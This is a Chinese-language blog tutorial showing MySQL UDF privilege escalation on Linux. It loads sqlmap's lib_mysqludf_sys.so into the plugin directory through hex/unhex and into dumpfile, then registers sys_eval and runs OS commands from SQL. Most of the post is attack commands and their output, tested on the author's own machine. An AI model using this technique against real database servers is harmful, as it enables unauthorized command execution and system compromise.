Linux利用UDF庫實現Mysql提權

Bacer發表於2021-09-09
LinuxMySql

環境:
os:linux(bt5)
 
database:mysql
 
簡述:
透過自定義庫函式來實現執行任意的程式,這裡只在linux下測試透過,具體到windows,所用的dll自然不同。
 
要求:
 在mysql庫下必須有func表,並且在‑‑skip‑grant‑tables開啟的情況下,UDF會被禁止;
 
過程: 得到外掛庫路徑 找對應作業系統的udf庫檔案 利用udf庫檔案載入函式並執行命令

1,得到外掛庫路徑

?

1234567 mysql> show variables like "%plugin%";+---------------+-----------------------+| Variable_name | Value         |+---------------+-----------------------+| plugin_dir  | /usr/lib/mysql/plugin |+---------------+-----------------------+1 row in set (0.00 sec)

2,找對應作業系統的udf庫檔案
因為自己測試,看了下自己系統的版本,64位
 

?

12 root@bt:~# uname -aLinux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

 
對於udf檔案,在sqlmap工具中自帶就有,只要找對應作業系統的版本即可

?

123456 root@bt:/pentest/database/sqlmap/udf/mysql# lslinux windowsroot@bt:/pentest/database/sqlmap/udf/mysql/linux# ls32 64root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# lslib_mysqludf_sys.so

3,利用udf庫檔案載入函式並執行命令
首先要得到udf庫檔案的十六進位制格式,可在本地透過
 

?

12 mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';Query OK, 1 row affected (0.04 sec)

 
因為我測試時,使用自帶賬戶,賬戶名mysql,並不是root,所以外掛目錄不可寫,而實際中,一般udf提權都是用root許可權啟動的mysql程式,故,不存在目錄許可權不足,不能訪問的情況。為了繼續,修改目錄許可權
 
root@bt:~# chmod 777 /usr/lib/mysql/plugin
 
資料庫中寫入udf庫到mysql庫目錄:
 

?

12 mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';Query OK, 1 row affected (0.04 sec)

 
檢視下這個udf庫所支援的函式

?

123456789101112131415161718192021222324252627282930313233343536373839404142 root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so         w _Jv_RegisterClasses0000000000201788 A __bss_start         w __cxa_finalize         w __gmon_start__0000000000201788 A _edata0000000000201798 A _end0000000000001178 T _fini0000000000000ba0 T _init         U fgets         U fork         U free         U getenv000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit0000000000001047 T lib_mysqludf_sys_info_init         U malloc         U mmap         U pclose         U popen         U realloc         U setenv         U strcpy         U strncpy0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init0000000000001066 T sys_exec0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init         U sysconf         U system         U waitpid

最後,載入函式並執行:

?

123456789101112131415161718 mysql> create function sys_eval returns string soname "mysqludf.so";Query OK, 0 rows affected (0.14 sec)  mysql> select sys_eval('whoami');+--------------------+| sys_eval('whoami') |+--------------------+| mysql       |+--------------------+1 row in set (0.04 sec)  mysql> select * from mysql.func;+----------+-----+-------------+----------+| name   | ret | dl     | type   |+----------+-----+-------------+----------+| sys_eval |  0 | mysqludf.so | function |+----------+-----+-------------+----------+1 row in set


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/2768/viewspace-2804837/,如需轉載,請註明出處,否則將追究法律責任。

相關文章